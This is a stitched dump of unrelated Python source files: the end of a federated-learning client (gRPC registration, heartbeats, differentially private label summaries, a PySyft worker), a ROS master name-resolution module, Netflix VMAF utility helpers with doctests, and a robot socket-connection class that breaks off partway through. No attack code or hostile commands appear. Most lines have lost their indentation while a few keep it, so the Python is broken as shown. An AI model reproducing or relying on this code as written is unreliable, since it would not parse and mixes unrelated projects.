resp = stub.RegisterToCentral(
devicetocentral_pb2.DeviceInfo (
ip = args.host,
flport = args.port
)
)
logging.info('Registration complete')
if resp.success :
logging.info(args.host + ':' + str(args.port) + ' registered with id ' + resp.id + '...')
global devid
devid = resp.id
return True
return False
# send device profile every 5 seconds to the central server
def heartbeat(args, once):
while(True):
if not once:
time.sleep(5)
        load = psutil.os.getloadavg()
        virt_mem = psutil.virtual_memory()
        battery = psutil.sensors_battery()
        # psutil.sensors_battery() returns None on machines without a battery
        percent = battery.percent if battery is not None else 0.0
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
            #logging.info('Heartbeat to server...')
resp = stub.HeartBeat(
devicetocentral_pb2.Ping (
cpu_usage = psutil.cpu_percent(),
ncpus = psutil.cpu_count(),
load15 = load[2],
virtual_mem = virt_mem.available/(1024*1024*1024),
battery = percent,
id = devid
)
)
if resp.ack :
pass
else:
logging.info('Connection to server failed...')
return
if once:
break
def send_summary(args, datacls):
global DP_EPSILON
tensor_train_x, tensor_train_y = datacls.get_training_data(devid)
train_y = tensor_train_y.numpy()
summaryType = args.summary.lower()
summaryPayload = ""
if summaryType == "py" or summaryType == "rnd" or summaryType == "tifl" or summaryType == "oort":
histInput = list(map(str, train_y.tolist()))
histSummary = HistSummary(histInput)
histSummary.addNoise(DP_EPSILON)
summaryPayload = histSummary.toJson()
elif summaryType == "pxy":
train_x = tensor_train_x.numpy()
histInput = {}
histMatInput = {}
labelSpace = list(map(str, np.unique(train_y)))
for label in labelSpace:
histInput[label] = []
if args.dataset.upper() == "CIFAR10":
for yIdx in range(len(train_y)):
label = str(train_y[yIdx])
xarr = train_x[yIdx,:].flatten()
counts, xLabels = np.histogram(xarr, bins=20, range=(0,1))
sd = []
for xIdx, numericLabel in enumerate(xLabels[:-1]):
count = counts[xIdx]
xLab = "b" + str(numericLabel)
sd = sd + count*[xLab]
histInput[label] += sd
else:
for idx in range(len(train_y)):
label = str(train_y[idx])
xarr = train_x[idx,:].flatten()
sd = list(map(str, xarr))
histInput[label] += sd
for label in labelSpace:
hip = histInput[label]
histMatInput[label] = HistSummary(hip)
histSummary = HistMatSummary(histMatInput)
histSummary.addNoise(DP_EPSILON)
summaryPayload = histSummary.toJson()
else:
print("Summary " + args.summary + " not implemented")
return False
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
logging.info('Sending summary to central server: ' + args.centralip + ':50051')
resp = stub.SendSummary(
devicetocentral_pb2.DeviceSummary (
id = devid,
type = summaryType,
summary = summaryPayload,
)
)
logging.info('Summary sending complete')
if resp.ack :
logging.info(args.host + ':' + str(args.port) + ' sent summary')
return True
return False
def start_websocket_server_worker(id, host, port, dataset, datacls, hook, verbose):
server = websocket_server.WebsocketServerWorker(
id = id,
host = '0.0.0.0',
port = port,
hook = hook,
verbose = verbose)
# Training data
train_data, train_targets = datacls.get_training_data(id)
dataset_train = sy.BaseDataset(
data = train_data,
targets = train_targets,
transform = transforms.Compose([transforms.ToTensor()])
)
server.add_dataset(dataset_train, key = dataset + '_TRAIN')
# Testing data
test_data, test_targets = datacls.get_testing_data(id)
dataset_test = sy.BaseDataset(
data = test_data,
targets = test_targets,
transform = transforms.Compose([transforms.ToTensor()])
)
server.add_dataset(dataset_test, key = dataset + '_TEST')
server.start()
return server
def parse_arguments(args = sys.argv[1:]):
parser = argparse.ArgumentParser(description='Run websocket server worker')
parser.add_argument(
'--port',
default = util.get_free_port(),
type=int,
help='port number on which websocket server will listen: --port 8777',
)
parser.add_argument(
'--host',
type=str,
default='localhost',
help='host on which the websocket server worker should be run: --host 1.2.3.4',
)
parser.add_argument(
'--id',
type=str,
default='alice',
help='name of the websocket server worker: --id alice'
)
parser.add_argument(
'--dataset',
'-ds',
type=str,
default='MNIST',
help='dataset used for the model: --dataset CIFAR10'
)
parser.add_argument(
'--summary',
'-s',
type=str,
default='tifl',
help='data summary to send: --summary py'
)
parser.add_argument(
'--centralip',
'-cip',
type=str,
default='localhost',
help = 'central server ip address: --centralip 1.2.3.4'
)
parser.add_argument(
'--verbose',
'-v',
action='store_true',
help='start websocket server worker in verbose mode: --verbose'
)
args = parser.parse_args(args = args)
return args
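# Example invocation (a sketch; hosts, ports and addresses are placeholders):
#   python run_client.py --host 1.2.3.4 --port 8777 --dataset MNIST \
#       --summary py --centralip 5.6.7.8 --verbose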
if __name__ == '__main__':
#Parse arguments
args = parse_arguments()
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
# grpc call to central server to register
stat = register_to_central(args)
if not stat:
print('Registration to central failed...')
sys.exit()
# set dataset class
from datasetFactory import DatasetFactory as dftry
datacls = dftry.getDataset(args.dataset)
# Training/Testing data
datacls.download_data()
_, _ = datacls.get_training_data(devid)
_, _ = datacls.get_testing_data(devid)
heartbeat(args, True)
# grpc call to send summary to central server
stat = send_summary(args, datacls)
if not stat:
print('Sending data summary failed')
sys.exit()
    # heartbeat to central server
heartbeat_service = threading.Thread(target=heartbeat, args=(args, False, ))
heartbeat_service.start()
# Hook PyTorch to add extra functionalities to support FL
hook = sy.TorchHook(torch)
# start server to receive model and train/test from central server
    server = start_websocket_server_worker(
id = devid,
host = args.host,
port = args.port,
dataset = args.dataset,
datacls = datacls,
hook = hook,
verbose = args.verbose
)
heartbeat_service.join()
|
name_resolution.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from threading import Thread, RLock
try:
from urlparse import urlparse # python 2 compatibility
except ImportError:
from urllib.parse import urlparse
import socket
import rospy
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import utf8
from fkie_node_manager_daemon.common import isstring
from fkie_node_manager_daemon import url as nmdurl
RESOLVE_CACHE = {} # hostname : address
class MasterEntry(object):
def __init__(self, masteruri=None, mastername=None, address=None):
self.masteruri = masteruri
self._masternames = []
if mastername:
self.add_mastername(mastername)
self.mutex = RLock()
# addresses: hostname (at first place if available), IPv4 or IPv6
self._addresses = []
self.add_address(address)
def __repr__(self):
return "MasterEntry<%s, names=%s, addresses=%s>" % (self.masteruri, self._masternames, self._addresses)
def entry(self):
return [self.masteruri] + list(self._addresses)
def has_mastername(self, mastername):
return mastername in self._masternames
def has_address(self, address):
return address in self._addresses
def add_mastername(self, mastername):
if mastername and mastername not in self._masternames:
self._masternames.insert(0, mastername)
def add_address(self, address):
with self.mutex:
if address and not self.has_address(address):
if self.is_legal_ip(address):
# it is an IP, try to get the hostname
self._addresses.append(address)
# resolve the name in a thread
thread = Thread(target=self._get_hostname, args=((address,)))
thread.daemon = True
thread.start()
else:
                # it is a hostname: add it at the first position and try to get an IP for this host
self._addresses.insert(0, address)
# resolve the name in a thread
thread = Thread(target=self._get_address, args=((address,)))
thread.daemon = True
thread.start()
@classmethod
def is_legal_ip(cls, addr):
result = False
try:
socket.inet_pton(socket.AF_INET, addr)
# ok, it is a legal IPv4 address
result = True
except socket.error:
# try for IPv6
try:
socket.inet_pton(socket.AF_INET6, addr)
# ok, it is a legal IPv6 address
result = True
except socket.error:
# not legal IP address
pass
return result
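    # For instance (a sketch): is_legal_ip('192.168.0.10') -> True, while
    # is_legal_ip('myhost') -> False, so add_address() treats 'myhost' as a
    # hostname and resolves it in a background thread.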
def _get_address(self, hostname):
try:
(_, _, ipaddrlist) = socket.gethostbyaddr(hostname)
with self.mutex:
if ipaddrlist:
RESOLVE_CACHE[hostname] = ipaddrlist
for addr in ipaddrlist:
if not self.has_address(addr):
self._addresses.append(addr)
except Exception:
# no suitable address found
pass
def _get_hostname(self, address):
try:
(hostname, _, _) = socket.gethostbyaddr(address)
with self.mutex:
name_splitted = hostname.split('.')
RESOLVE_CACHE[address] = [name_splitted[0], hostname]
if not self.has_address(hostname):
self._addresses.insert(0, hostname)
if not self.has_address(name_splitted[0]):
self._addresses.insert(0, name_splitted[0])
except Exception:
# no suitable address found
pass
def get_mastername(self):
try:
return self._masternames[0]
except Exception:
return None
def get_masternames(self):
return list(self._masternames)
def get_address(self, prefer_hostname=True):
with self.mutex:
try:
if prefer_hostname:
return self._addresses[0]
return self._addresses[-1]
except Exception:
return None
def addresses(self):
return list(self._addresses)
def remove_mastername(self, mastername):
try:
self._masternames.remove(mastername)
except Exception:
pass
def remove_address(self, address):
try:
self._addresses.remove(address)
except Exception:
pass
def __eq__(self, item):
if isinstance(item, MasterEntry):
result = []
if nmdurl.equal_uri(self.masteruri, item.masteruri):
result = set(self.addresses()).intersection(set(item.addresses()))
return len(result) > 0
return False
class NameResolution(object):
'''
This class stores the association between master URI, master name and
host name or IP. Both the setter and the getter methods are thread safe.
'''
def __init__(self):
self.mutex = RLock()
self._masters = [] # sets with masters
self._hosts = [] # sets with hosts
self._address = [] # avoid the mixing of ip and name as address
def get_master(self, masteruri, address=None):
me = MasterEntry(masteruri, None, address)
with self.mutex:
for m in self._masters:
if m == me:
return m
return me
def remove_master_entry(self, masteruri):
with self.mutex:
for m in self._masters:
if masteruri and m.masteruri == masteruri:
self._masters.remove(m)
return
def remove_info(self, mastername, address):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername) and m.has_address(address):
m.remove_mastername(mastername)
m.remove_address(address)
return
def add_master_entry(self, masteruri, mastername, address):
with self.mutex:
mastername = self._validate_mastername(mastername, masteruri)
for m in self._masters:
if m.masteruri and m.masteruri == masteruri:
m.add_mastername(mastername)
m.add_address(address)
return
elif m.masteruri is None and m.has_mastername(mastername):
m.masteruri = masteruri
m.add_mastername(mastername)
m.add_address(address)
return
self._masters.append(MasterEntry(masteruri, mastername, address))
def add_info(self, mastername, address):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername):
m.add_mastername(mastername)
m.add_address(address)
return
if mastername is not None:
self._masters.append(MasterEntry(None, mastername, address))
def _validate_mastername(self, mastername, masteruri):
'''
Not thread safe
'''
mm = self.masteruri(mastername)
if mm and mm != masteruri:
nr = 2
new_name = '%s_%d' % (mastername, nr)
mm = self.masteruri(new_name)
while mm and mm != masteruri:
nr = nr + 1
new_name = '%s_%d' % (mastername, nr)
mm = self.masteruri(new_name)
rospy.logwarn("master name '%s' is already assigned to '%s', rename to '%s'" % (mastername, mm, new_name))
return new_name
return mastername
def has_master(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
return True
return False
def mastername(self, masteruri, address=None):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
if address is not None:
if m.has_address(address):
return m.get_mastername()
else:
return m.get_mastername()
return get_hostname(masteruri)
def masternames(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri:
return m.get_masternames()
return list()
def masternamebyaddr(self, address):
with self.mutex:
for m in self._masters:
if m.has_address(address):
return m.get_mastername()
return None
def masteruri(self, mastername):
with self.mutex:
for m in self._masters:
if m.has_mastername(mastername):
return m.masteruri
return None
def masteruribyaddr(self, address):
with self.mutex:
for m in self._masters:
if m.has_address(address) and m.masteruri:
return m.masteruri
return None
def masterurisbyaddr(self, address):
with self.mutex:
result = []
for m in self._masters:
if m.has_address(address) and m.masteruri and m.masteruri not in result:
result.append(m.masteruri)
return result
def address(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri or m.has_mastername(masteruri):
return m.get_address(prefer_hostname=False)
return get_hostname(masteruri)
def addresses(self, masteruri):
with self.mutex:
for m in self._masters:
if m.masteruri == masteruri or m.has_mastername(masteruri):
return m.addresses()
return []
def hostname(self, address, resolve=False):
with self.mutex:
for m in self._masters:
if m.has_address(address) or m.has_mastername(address):
result = m.get_address()
if result and not MasterEntry.is_legal_ip(result):
return result
else:
break
try:
pass
#self.add_address(address)
# if MasterEntry.is_legal_ip(address):
# (hostname, _, _) = socket.gethostbyaddr(address)
# return hostname
except Exception:
import traceback
print(traceback.format_exc())
return address
@classmethod
def masteruri2name(cls, masteruri):
result = masteruri
try:
url = urlparse(masteruri)
if url.port == 11311:
result = '%s' % url.hostname
else:
result = '%s_%d' % (url.hostname, url.port)
except Exception:
pass
return cls.normalize_name(result)
@classmethod
def normalize_name(cls, name):
result = name.replace('-', '_').replace('.', '_')
return result
@classmethod
def is_legal_ip(cls, address):
return MasterEntry.is_legal_ip(address)
def resolve_cached(self, hostname):
try:
return RESOLVE_CACHE[hostname]
except Exception:
pass
return [hostname]
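# A small usage sketch (URIs, names and addresses below are placeholders):
#   nr = NameResolution()
#   nr.add_master_entry('http://myhost:11311/', 'myhost', '192.168.0.10')
#   nr.mastername('http://myhost:11311/')                   # -> 'myhost'
#   nr.addresses('http://myhost:11311/')                    # -> contains '192.168.0.10' (plus resolved hostnames)
#   NameResolution.masteruri2name('http://myhost:11311/')   # -> 'myhost'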
|
misc.py
|
import subprocess
from fnmatch import fnmatch
import multiprocessing
from time import sleep, time
import itertools
__copyright__ = "Copyright 2016-2020, Netflix, Inc."
__license__ = "BSD+Patent"
import sys
import errno
import os
import re
from vmaf import run_process
from vmaf.tools.scanf import sscanf, IncompleteCaptureError, FormatError
try:
unicode # noqa, remove this once python2 support is dropped
except NameError:
unicode = str
def get_stdout_logger():
import logging
logger = logging.getLogger()
handler = logging.StreamHandler(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
return logger
def close_logger(logger):
for handler in logger.handlers:
handler.close()
logger.removeHandler(handler)
def get_file_name_without_extension(path):
"""
>>> get_file_name_without_extension('yuv/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('yuv/src01_hrc01')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.yuv')
'src01_hrc01.sdr'
>>> get_file_name_without_extension('abc/xyz/src01_hrc01.sdr.dvi.yuv')
'src01_hrc01.sdr.dvi'
"""
return os.path.splitext(path.split("/")[-1])[0]
def get_file_name_with_extension(path):
"""
>>> get_file_name_with_extension('yuv/src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('src01_hrc01.yuv')
'src01_hrc01.yuv'
>>> get_file_name_with_extension('abc/xyz/src01_hrc01.yuv')
'src01_hrc01.yuv'
"""
return path.split("/")[-1]
def get_file_name_extension(path):
'''
>>> get_file_name_extension("file:///mnt/zli/test.txt")
'txt'
>>> get_file_name_extension("test.txt")
'txt'
>>> get_file_name_extension("abc")
'abc'
'''
return path.split('.')[-1]
def get_normalized_path(dir_):
"""
>>> get_normalized_path('abc/xyz/')
'abc/xyz'
>>> get_normalized_path('abc/xyz')
'abc/xyz'
>>> get_normalized_path('abc/xyz.txt')
'abc/xyz.txt'
"""
if dir_[-1] == '/':
return dir_[:-1]
else:
return dir_
def get_dir_without_last_slash(path):
"""
>>> get_dir_without_last_slash('abc/src01_hrc01.yuv')
'abc'
>>> get_dir_without_last_slash('src01_hrc01.yuv')
''
>>> get_dir_without_last_slash('abc/xyz/src01_hrc01.yuv')
'abc/xyz'
>>> get_dir_without_last_slash('abc/xyz/')
'abc/xyz'
"""
return "/".join(path.split("/")[:-1])
def make_parent_dirs_if_nonexist(path):
dst_dir = get_dir_without_last_slash(path)
# create dir if not exist yet
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
def delete_dir_if_exists(dir):
if os.path.isdir(dir):
os.rmdir(dir)
def get_normalized_string_from_dict(d):
""" Normalized string representation with sorted keys.
>>> get_normalized_string_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
'bitrate_kbps_45_max_buffer_sec_5.0'
"""
return '_'.join(map(lambda k: '{k}_{v}'.format(k=k,v=d[k]), sorted(d.keys())))
def get_hashable_value_tuple_from_dict(d):
""" Hashable tuple of values with sorted keys.
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, })
(45, 5.0)
>>> get_hashable_value_tuple_from_dict({"max_buffer_sec": 5.0, "bitrate_kbps": 45, "resolutions": [(740, 480), (1920, 1080), ]})
(45, 5.0, ((740, 480), (1920, 1080)))
"""
return tuple(map(
lambda k: tuple(d[k]) if isinstance(d[k], list) else d[k],
sorted(d.keys())))
def get_unique_str_from_recursive_dict(d):
""" String representation with sorted keys and values for recursive dict.
>>> get_unique_str_from_recursive_dict({'a':1, 'b':2, 'c':{'x':'0', 'y':'1'}})
'{"a": 1, "b": 2, "c": {"x": "0", "y": "1"}}'
>>> get_unique_str_from_recursive_dict({'a':1, 'c':2, 'b':{'y':'1', 'x':'0', }})
'{"a": 1, "b": {"x": "0", "y": "1"}, "c": 2}'
"""
from collections import OrderedDict
import json
def to_ordered_dict_recursively(d):
if isinstance(d, dict):
return OrderedDict(map(
lambda t: (to_ordered_dict_recursively(t[0]), to_ordered_dict_recursively(t[1])),
sorted(d.items())
))
else:
return d
return json.dumps(to_ordered_dict_recursively(d))
def indices(a, func):
"""
Get indices of elements in an array which satisfies func
>>> indices([1, 2, 3, 4], lambda x: x>2)
[2, 3]
>>> indices([1, 2, 3, 4], lambda x: x==2.5)
[]
>>> indices([1, 2, 3, 4], lambda x: x>1 and x<=3)
[1, 2]
>>> indices([1, 2, 3, 4], lambda x: x in [2, 4])
[1, 3]
>>> indices([1,2,3,1,2,3,1,2,3], lambda x: x > 2)
[2, 5, 8]
"""
return [i for (i, val) in enumerate(a) if func(val)]
def import_python_file(filepath):
"""
Import a python file as a module.
:param filepath:
:return:
"""
filename = get_file_name_without_extension(filepath)
try:
from importlib.machinery import SourceFileLoader
ret = SourceFileLoader(filename, filepath).load_module()
except ImportError:
import imp
ret = imp.load_source(filename, filepath)
return ret
def make_absolute_path(path, current_dir):
'''
>>> make_absolute_path('abc/cde.fg', '/xyz/')
'/xyz/abc/cde.fg'
>>> make_absolute_path('/abc/cde.fg', '/xyz/')
'/abc/cde.fg'
'''
if path[0] == '/':
return path
else:
return current_dir + path
def empty_object():
return type('', (), {})()
def get_cmd_option(argv, begin, end, option):
'''
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 3, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, '--xyz')
'123'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 4, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 5, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 6, 5, '--xyz')
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'a')
'b'
>>> get_cmd_option(['a', 'b', 'c', '--xyz', '123'], 0, 5, 'b')
'c'
'''
itr = None
for itr in range(begin, end):
if argv[itr] == option:
break
if itr is not None and itr != end and (itr + 1) != end:
return argv[itr + 1]
return None
def cmd_option_exists(argv, begin, end, option):
'''
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'c')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'c')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 3, 4, 'd')
True
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'a')
False
>>> cmd_option_exists(['a', 'b', 'c', 'd'], 2, 4, 'b')
False
'''
found = False
for itr in range(begin, end):
if argv[itr] == option:
found = True
break
return found
def index_and_value_of_min(l):
'''
>>> index_and_value_of_min([2, 0, 3])
(1, 0)
'''
return min(enumerate(l), key=lambda x: x[1])
def parallel_map(func, list_args, processes=None):
"""
Build my own parallelized map function since multiprocessing's Process(),
or Pool.map() cannot meet my both needs:
1) be able to control the maximum number of processes in parallel
2) be able to take in non-picklable objects as arguments
"""
# get maximum number of active processes that can be used
max_active_procs = processes if processes is not None else multiprocessing.cpu_count()
# create shared dictionary
return_dict = multiprocessing.Manager().dict()
# define runner function
def func_wrapper(idx_args):
idx, args = idx_args
executor = func(args)
return_dict[idx] = executor
# add idx to args
list_idx_args = []
for idx, args in enumerate(list_args):
list_idx_args.append((idx, args))
procs = []
for idx_args in list_idx_args:
proc = multiprocessing.Process(target=func_wrapper, args=(idx_args,))
procs.append(proc)
waiting_procs = set(procs)
active_procs = set([])
# processing
while True:
# check if any procs in active_procs is done; if yes, remove them
for p in active_procs.copy():
if not p.is_alive():
active_procs.remove(p)
# check if can add a proc to active_procs (add gradually one per loop)
if len(active_procs) < max_active_procs and len(waiting_procs) > 0:
# move one proc from waiting_procs to active_procs
p = waiting_procs.pop()
active_procs.add(p)
p.start()
# if both waiting_procs and active_procs are empty, can terminate
if len(waiting_procs) == 0 and len(active_procs) == 0:
break
sleep(0.01) # check every x sec
# finally, collect results
rets = list(map(lambda idx: return_dict[idx], range(len(list_args))))
return rets
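# Quick usage sketch for parallel_map (illustrative; assumes a fork-based start
# method so the closure does not need to be pickled):
#   parallel_map(lambda x: x * x, [1, 2, 3], processes=2)   # -> [1, 4, 9]
# Results are gathered through a Manager dict keyed by index, so they come back
# in the original argument order even if the processes finish out of order.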
def check_program_exist(program):
'''
>>> check_program_exist("xxxafasd34df")
False
>>> check_program_exist("xxxafasd34df f899")
False
>>> check_program_exist("ls")
True
>>> check_program_exist("ls -all")
True
>>> check_program_exist("pwd")
True
'''
try:
subprocess.call(program.split(), stdout=open(os.devnull, 'wb'))
return True
except OSError as e:
if e.errno == errno.ENOENT:
return False
else:
            # Something else went wrong while trying to run the program
raise
def check_scanf_match(string, template):
'''
>>> check_scanf_match('frame00000000.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000003.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame0000001.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('frame00000001.icpff', 'frame%08d.icpf')
True
>>> check_scanf_match('gframe00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('fyrame00000001.icpff', 'frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy/frame%08d.icpf')
True
>>> check_scanf_match('xx/yy//frame00000000.icpf', 'xx/yy/frame%08d.icpf')
False
>>> check_scanf_match('xx/yy/frame00000000.icpf', 'xx/yy//frame%08d.icpf')
False
>>> check_scanf_match("-1-2+3-4", "%02d%02d%02d%02d")
True
>>> check_scanf_match('frame00000240.icpf', 'frame%08d.icpf')
True
>>> check_scanf_match('/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_30.yuv.avi', '/mnt/hgfs/ZLI-NFLX-10/USCJND/ref/1920x1080/videoSRC001_1920x1080_*.yuv.avi')
True
'''
ret = False
try:
sscanf(string, template)
return True
except (FormatError, IncompleteCaptureError):
pass
if fnmatch(string, template):
return True
return False
def match_any_files(template):
dir_ = os.path.dirname(template)
for filename in os.listdir(dir_):
filepath = dir_ + '/' + filename
if check_scanf_match(filepath, template):
return True
return False
def unroll_dict_of_lists(dict_of_lists):
""" Unfold a dictionary of lists into a list of dictionaries.
>>> dict_of_lists = {'norm_type':['normalize'], 'n_estimators':[10, 50], 'random_state': [0]}
>>> expected = [{'n_estimators': 10, 'norm_type': 'normalize', 'random_state': 0}, {'n_estimators': 50, 'norm_type': 'normalize', 'random_state': 0}]
>>> unroll_dict_of_lists(dict_of_lists) == expected
True
"""
keys = sorted(dict_of_lists.keys()) # normalize order
list_of_key_value_pairs = []
for key in keys:
values = dict_of_lists[key]
key_value_pairs = []
for value in values:
key_value_pairs.append((key, value))
list_of_key_value_pairs.append(key_value_pairs)
list_of_key_value_pairs_rearranged = \
itertools.product(*list_of_key_value_pairs)
list_of_dicts = []
for key_value_pairs in list_of_key_value_pairs_rearranged:
list_of_dicts.append(dict(key_value_pairs))
return list_of_dicts
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
"""
import unicodedata
    value = unicodedata.normalize('NFKD', unicode(value)).encode('ascii', 'ignore').decode('ascii')
    value = unicode(re.sub(r'[^\w\s-]', '', value).strip().lower())
    value = unicode(re.sub(r'[-\s]+', '-', value))
return value
def neg_if_even(x):
"""
>>> neg_if_even(2)
-1
>>> neg_if_even(1)
1
>>> neg_if_even(0)
-1
>>> neg_if_even(-1)
1
>>> neg_if_even(-2)
-1
"""
return 1 - (x % 2 == 0) * 2
def get_unique_sorted_list(l):
"""
>>> get_unique_sorted_list([3, 4, 4, 1])
[1, 3, 4]
>>> get_unique_sorted_list([])
[]
"""
return sorted(list(set(l)))
class Timer(object):
def __enter__(self):
self.tstart = time()
def __exit__(self, type, value, traceback):
print('Elapsed: %s sec' % (time() - self.tstart))
def dedup_value_in_dict(d):
"""
>>> dedup_value_in_dict({'a': 1, 'b': 1, 'c': 2}) == {'a': 1, 'c': 2}
True
"""
reversed_d = dict()
keys = sorted(d.keys())
for key in keys:
value = d[key]
if value not in reversed_d:
reversed_d[value] = key
d_ = dict()
for value, key in reversed_d.items():
d_[key] = value
return d_
if __name__ == '__main__':
import doctest
doctest.testmod()
|
robot_connection.py
|
#! python3
import socket
import threading
import select
import queue
from . import logger
from .decorators import retry
class RobotConnection(object):
"""
Create a RobotConnection object with a given robot ip.
"""
VIDEO_PORT = 40921
AUDIO_PORT = 40922
CTRL_PORT = 40923
PUSH_PORT = 40924
EVENT_PORT = 40925
IP_PORT = 40926
def __init__(self, robot_ip=''):
self.robot_ip = robot_ip
self.log = logger.Logger(self)
self.video_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.push_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.event_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.push_socket.bind(('', RobotConnection.PUSH_PORT))
self.ip_socket.bind(('', RobotConnection.IP_PORT))
self.recv_socket_list = [self.push_socket, self.event_socket]
self.socket_msg_queue = {
self.video_socket: queue.Queue(32),
self.audio_socket: queue.Queue(32),
self.push_socket: queue.Queue(16),
self.event_socket: queue.Queue(16)
}
self.socket_recv_thread = threading.Thread(target=self.__socket_recv_task)
self.is_shutdown = True
def update_robot_ip(self, robot_ip):
"""
Update the robot ip
"""
self.robot_ip = robot_ip
def get_robot_ip(self, timeout=None):
"""
        Get the robot ip from the ip broadcast port
If optional arg 'timeout' is None (the default), block if necessary until
get robot ip from broadcast port. If 'timeout' is a non-negative number,
it blocks at most 'timeout' seconds and return None if no data back from
robot broadcast port within the time. Otherwise, return the robot ip
immediately.
"""
self.ip_socket.settimeout(timeout)
msg = None
try:
msg, addr = self.ip_socket.recvfrom(1024)
except Exception as e:
            self.log.error('Failed to get the robot ip, please check the robot network mode and connection!')
else:
msg = msg.decode('utf-8')
msg = msg[msg.find('robot ip ') + len('robot ip ') : ]
return msg
@retry(n_retries=5)
def open(self):
"""
Open the connection
It will connect the control port and event port with TCP and start a data
receive thread.
"""
self.ctrl_socket.settimeout(5)
try:
self.ctrl_socket.connect((self.robot_ip, RobotConnection.CTRL_PORT))
self.event_socket.connect((self.robot_ip, RobotConnection.EVENT_PORT))
except Exception as e:
self.log.warn('Connection failed, the reason is %s.'%e)
return False
else:
self.is_shutdown = False
self.socket_recv_thread.start()
self.log.info('Connection successful.')
return True
def close(self):
"""
Close the connection
"""
self.is_shutdown = True
self.socket_recv_thread.join()
def start_video_recv(self):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
if self.video_socket not in self.recv_socket_list:
self.video_socket.settimeout(5)
try:
self.video_socket.connect((self.robot_ip, RobotConnection.VIDEO_PORT))
except Exception as e:
self.log.error('Connection failed, the reason is %s'%e)
return False
self.recv_socket_list.append(self.video_socket)
return True
def stop_video_recv(self):
if self.video_socket in self.recv_socket_list:
self.recv_socket_list.remove(self.video_socket)
return True
def start_audio_recv(self):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
if self.audio_socket not in self.recv_socket_list:
self.audio_socket.settimeout(5)
try:
self.audio_socket.connect((self.robot_ip, RobotConnection.AUDIO_PORT))
except Exception as e:
self.log.error('Connection failed, the reason is %s'%e)
return False
self.recv_socket_list.append(self.audio_socket)
return True
def stop_audio_recv(self):
